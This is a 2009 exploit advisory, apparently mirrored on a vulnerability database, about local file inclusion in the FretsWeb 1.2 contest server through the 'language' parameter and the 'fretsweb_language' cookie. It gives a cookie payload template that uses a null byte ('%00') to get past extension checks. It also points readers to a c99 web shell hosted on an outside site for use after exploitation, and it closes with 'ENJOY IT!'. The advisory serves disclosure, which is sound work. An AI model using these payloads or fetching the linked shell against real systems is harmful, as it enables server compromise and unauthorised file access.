Lucene search
SecurityvulnsSECURITYVULNS:DOC:22066HistoryJun 22, 2009 - 12:00 a.m.
FretsWeb 1.2 Multiple Local File Inclusion Vulnerabilities
2009-06-2200:00:00
vulners.com
10
| MULTIPLE LOCAL FILE INCLUSION VULNERABILITIES |
|---|
| CMS INFORMATION: ------------------------ |
| Author : xhaxkerx |
| Special Thankz : yasin |
| Site : http://www.c99.mobi |
| –>WEB: http://sourceforge.net/projects/fretsweb/ |
| –>DOWNLOAD: http://sourceforge.net/projects/fretsweb/ |
| –>DEMO: N/A |
| –>CATEGORY: CMS / Games/Entertainment |
| –>DESCRIPTION: Fretsweb is a Contest or Chart Server for Frets on Fire. It… |
| is an improved version of FoFCS.It is meant for… |
| –>RELEASED: 2009-05-30 |
| CMS VULNERABILITY: |
| –>TESTED ON: firefox 3 |
| –>DORK: N/A |
| –>CATEGORY: LOCAL FILE INCLUSION (LFI) / INSECURE COOKIE HANDLING (LFI) |
| –>AFFECT VERSION: CURRENT (MAYBE <= ?) |
| –>Discovered Bug date: 2009-06-02 |
| –>Reported Bug date: 2009-06-02 |
| –>Fixed bug date: 2009-06-14 |
| –>Info patch: http://sourceforge.net/projects/fretsweb/ |
| –>WEB/BLOG: N/A |
| –>COMMENT: A mi novia Marijose…hermano,cunyada, padres (y amigos xD) por su apoyo. |
| –>EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) |
Note: Of course use null byte (%00) when you want to include a file with different extension to "php"
###########################
///////////////////////////
LOCAL FILE INCLUSION (LFI):
///////////////////////////
###########################
<<<<---------++++++++++++++ Condition: Nothing ++++++++++++++++±-------->>>>
[++] GET var –> 'language'
###############################
///////////////////////////////
INSECURE COOKIE HANDLING (LFI):
///////////////////////////////
###############################
# if you need shell http://www.c99.mobi/c99.txt
[++] Cookie --> 'fretsweb_language'
~~~> fretsweb_language=[LFI]%00
<<<-----------------------------EOF---------------------------------->>>ENJOY IT!